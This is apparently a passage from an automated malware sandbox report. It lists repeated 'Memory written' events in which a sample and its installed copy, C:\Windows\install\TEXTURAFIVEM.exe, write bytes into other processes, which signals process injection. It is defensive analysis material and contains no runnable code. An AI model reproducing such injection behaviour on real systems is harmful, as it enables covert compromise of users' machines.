            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 72F0000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: AEC0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: AE60000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: AE90000 value: 73Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: AED0000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: AF00000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: B0A0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 24010000 value: 4DJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: B0F0000 value: 00Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: B120000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3330000 value: 4BJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3340000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3350000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 33E0000 value: 4CJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 33F0000 value: 4BJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3600000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3610000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3620000 value: 47Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3630000 value: 4BJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3640000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3650000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3660000 value: 56Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3670000 value: 4BJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3680000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3690000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3B00000 value: 56Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3B10000 value: 4BJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3B20000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3B30000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3B40000 value: 56Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3B50000 value: 4BJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3B60000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3B70000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3B80000 value: 61Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3B90000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3BA0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3BC0000 value: 52Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3BD0000 value: 61Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3BE0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3BF0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3C00000 value: 41Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3C10000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3C20000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 53E0000 value: 63Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 53F0000 value: 41Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5400000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5410000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5450000 value: 67Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5460000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5470000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5480000 value: 42Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5490000 value: 67Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 54A0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 54B0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 54C0000 value: 67Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 54D0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 54E0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 54F0000 value: 47Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5500000 value: 67Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5510000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 55A0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 55B0000 value: 6DJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 55C0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 55D0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 55E0000 value: 57Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 55F0000 value: 6DJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5600000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5610000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 56A0000 value: 6DJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 56B0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 56C0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 56D0000 value: 61Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 56E0000 value: 6DJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 56F0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5700000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5710000 value: 6EJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 57A0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 57B0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 57C0000 value: 5AJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 57D0000 value: 6EJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 57E0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 57F0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5800000 value: 6FJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5810000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 58A0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 58B0000 value: 43Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 58C0000 value: 6FJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 58D0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 58E0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 58F0000 value: 6FJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5900000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5910000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 59A0000 value: 53Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 59B0000 value: 6FJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 59C0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 59D0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 59E0000 value: 70Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 59F0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5A00000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5A10000 value: 53Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5AA0000 value: 70Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5AB0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5AC0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5AD0000 value: 73Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5AE0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5AF0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5B00000 value: 53Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5B10000 value: 73Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5BA0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5BB0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5BC0000 value: 75Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5BD0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5BE0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5BF0000 value: 47Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5C00000 value: 75Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5C10000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5CA0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5CB0000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5CC0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5CD0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5CE0000 value: 46Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5CF0000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5D00000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5D10000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5DA0000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5DB0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5DC0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5DD0000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5DE0000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5DF0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5E00000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5E10000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5EA0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5EB0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5EC0000 value: 73Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5ED0000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5EE0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5EF0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 24080000 value: 4DJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5F00000 value: 00Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5F10000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: CB0000 value: 4BJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: CC0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: CD0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: D60000 value: 4CJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: D70000 value: 4BJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: D80000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: D90000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: DA0000 value: 47Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: DB0000 value: 4BJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: DC0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: DD0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: DE0000 value: 56Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: DF0000 value: 4BJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: E00000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: E10000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 3370000 value: 56Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4DB0000 value: 4BJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4DC0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4DD0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4DE0000 value: 56Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4DF0000 value: 4BJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4E00000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4E10000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4E20000 value: 61Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4E30000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4E40000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4E50000 value: 52Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4E60000 value: 61Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4E70000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4E80000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4E90000 value: 41Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4EA0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4EB0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4EC0000 value: 63Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4ED0000 value: 41Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4EF0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4F00000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4F40000 value: 67Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4F50000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4F60000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4F70000 value: 42Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4F80000 value: 67Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4F90000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4FA0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4FB0000 value: 67Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4FC0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4FD0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4FE0000 value: 47Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5070000 value: 67Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5080000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5090000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 50A0000 value: 6DJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 50B0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 50C0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 50D0000 value: 57Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 50E0000 value: 6DJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5170000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5180000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5190000 value: 6DJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 51A0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 51B0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 51C0000 value: 61Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 51D0000 value: 6DJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 51E0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5270000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5280000 value: 6EJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5290000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 52A0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 52B0000 value: 5AJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 52C0000 value: 6EJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 52D0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 52E0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5370000 value: 6FJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5380000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5390000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 53A0000 value: 43Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 53B0000 value: 6FJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 53C0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 53D0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 53E0000 value: 6FJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5470000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5480000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5490000 value: 53Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 54A0000 value: 6FJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 54B0000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 54C0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 54D0000 value: 70
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 54E0000 value: B0
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 5570000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 5580000 value: 53
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 5590000 value: 70
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 55A0000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 55B0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 55C0000 value: 73
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 55D0000 value: B0
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 55E0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 5670000 value: 53
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 5680000 value: 73
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 5690000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 56A0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 56B0000 value: 75
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 56C0000 value: B0
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 56D0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 56E0000 value: 47
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 5770000 value: 75
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 5780000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 5790000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 57A0000 value: 77
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 57B0000 value: B0
